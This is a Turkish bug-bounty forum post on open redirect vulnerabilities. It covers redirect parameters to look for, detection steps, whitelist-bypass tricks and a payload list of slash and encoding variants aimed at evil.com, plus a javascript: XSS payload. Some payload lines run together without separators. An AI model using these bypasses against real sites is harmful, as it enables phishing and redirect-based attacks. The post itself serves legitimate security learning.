Neler yeni
Bughane Academy

Bughane Academy, bug bounty, web güvenliği ve sızma testi alanında kendini geliştirmek isteyenler için kurulmuş Türkçe odaklı bir topluluktur.

Burada; gerçek güvenlik açıkları, recon ve exploit teknikleri, payload & bypass yöntemleri, araçlar, scriptler ve write-up’lar topluluk tarafından paylaşılır ve tartışılır.

Birlikte öğren, birlikte üret, birlikte güçlen.

Open Redirect (Açık Yönlendirme) Zafiyeti

  • Konuyu Başlatan Konuyu Başlatan 1atakan1
  • Başlangıç tarihi Başlangıç tarihi

1atakan1

Moderator
Aday
Katılım
2 Ocak 2026
Mesajlar
19
Tepkime puanı
22
Puan
3

Özet Bilgi ve Kritik Etki​

Etki: Phishing saldırıları, tarayıcıda XSS (javascript: protokolü ile), SSRF zafiyetine yol açan zincirleme saldırılar.
Uygulama, URL'de belirtilen yönlendirme hedefini (Location header) hiçbir güvenlik kontrolü yapmadan kullanır.

Hızlı Tespit ve PoC Adımları​

Adım 1: Parametre Taraması: ?redirect=, ?next=, ?target=, ?url=, ?continue=, ?returnTo= gibi parametreleri arayın. Otomatik tarama için ParamSpider veya waybackurls çıktısını grepleyin.
Adım 2: Temel PoC: Parametre değerine https://google.com gibi bir harici URL verip yönlenip yönlenmediğini kontrol edin.
Adım 3: Protokol Trick: Parametre değerine //google.com veya /\/google.com verin. Filtre sadece "http" veya "https" kontrolü yapıyorsa bu atlatma çalışabilir.

(Bypass Teknikleri (Whitelist Atlatma)​

Domain Taklidi: Uygulama sadece kendi domainine izin veriyorsa: https://hedef.com.kötüamaclisite.com deneyin.
Path Atlatma: https://hedef.com/../kötüamaclisite.com (Path normalizasyonu hatalarını sömürme).
Ekstra Karakterler: https://kötüamaclisite.com (Boşluk, tab gibi kontrolsüz karakterler ekleme).
Data/Javascript URI: javascript:alert(document.domain) veya data:text/html;base64,... deneyerek XSS'e çevirmeye çalışın.

PoC Örnekleri (Yönlendirme Senaryoları)​

Phishing Senaryosu (Subdomain Trick):Güvenilir site adını içeren kötü amaçlı bir URL. Protokol/Kodlama Bypass: Filtrelemeyi atlatmak için çift eğik çizgi veya ters slash kodlaması kullanma.https://hedefsite.com/continue?url=//kötüamaclisite.com https://hedefsite.com/goto?path=/\evil.com

Gelişmiş Bypass Payload Listesi​

1. Slash (/) ve Backslash (\) Manipülasyonları
//evil.com///evil.com/\/\/evil.com\\/evil.com//\\evil.com\\/..\\/evil.com

2. URL Encoding Teknikleri
%2F/evil.com%5Cevil.com%2f%2fevil.com%09/evil.com (Tab)%20/evil.com (Space)%00/evil.com (Null)

3. Nokta (.) ve Domain Doğrulama Hataları

4. Diğer Karışık Bypass Örnekleri
//https://evil.comhttp:evil.com//evil.com///evil.com///.evil.com//google%00.com<>//evil.com
 
Geri
Üst